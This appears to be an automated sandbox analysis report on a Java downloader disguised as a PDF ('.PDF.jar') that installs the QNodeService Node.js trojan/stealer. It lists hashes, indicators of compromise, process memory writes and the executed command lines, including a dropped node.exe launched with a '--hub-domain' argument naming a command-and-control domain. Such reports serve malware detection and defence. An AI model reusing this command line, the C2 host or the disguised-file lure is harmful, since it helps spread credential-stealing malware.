qnodeservice | 8d59383c5423640a6c9d8431c0d455b80db61186296f7c0a4946062e05908e59

Analysis

Target

cid_5B9CEC37-5A8C-4D4C-A085-A20165C7A6A5.PDF.jar
Size

98KB
MD5

84fb8e3cbbb90fb05533a07b63d3136e
SHA1

3914d74544c66b94379e4fc7f9d56f651146fd69
SHA256

8d59383c5423640a6c9d8431c0d455b80db61186296f7c0a4946062e05908e59
SHA512

ac4240aa9016efc34a289538795bdabe09a53f9199f8d8986c219652073f37afc996c48e67aca946f04c297f17b5fa7f2a61bf968ddc16c9009b841a0ba12ab9

Score

10^/10

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
trojan qnodeservice

Executes dropped EXE 1 IoCs

pid	Process
184	node.exe

JavaScript code in executable 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ab95-168.dat	js

Suspicious behavior: EnumeratesProcesses 4 IoCs

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1304 wrote to memory of 3828	1304	java.exe	76
PID 1304 wrote to memory of 3828	1304	java.exe	76
PID 3828 wrote to memory of 184	3828	javaw.exe	80
PID 3828 wrote to memory of 184	3828	javaw.exe	80

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\cid_5B9CEC37-5A8C-4D4C-A085-A20165C7A6A5.PDF.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\6b6f80de.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain drylocktechnologie.com
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:184

memory/184-169-0x000000EC89C00000-0x000000EC89C01000-memory.dmp

Filesize
4KB

Download